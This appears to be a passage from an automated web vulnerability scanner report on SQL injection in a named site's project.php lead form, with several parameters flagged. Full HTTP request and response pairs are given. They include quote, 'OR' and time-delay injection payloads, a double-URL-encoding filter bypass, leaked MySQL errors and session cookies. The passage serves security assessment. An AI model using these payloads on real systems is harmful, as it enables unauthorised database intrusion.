GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3'&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3'&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.357. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_555_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_555_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_555_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3%2527&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ka5ldhm6c812aoojjqbg3bft02; path=/
Content-Length: 7334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
&attributeId_555_t=3%27&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3%2527%2527&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0gu8u75itgvpgi7bppdjri1234; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.358. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_555_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_555_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_555_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3'&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3'&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3''&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.359. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_556_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_556_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_556_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.360. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_556_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_556_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_556_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.361. http://www.insideup.com/ppc/leadflow/hins00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

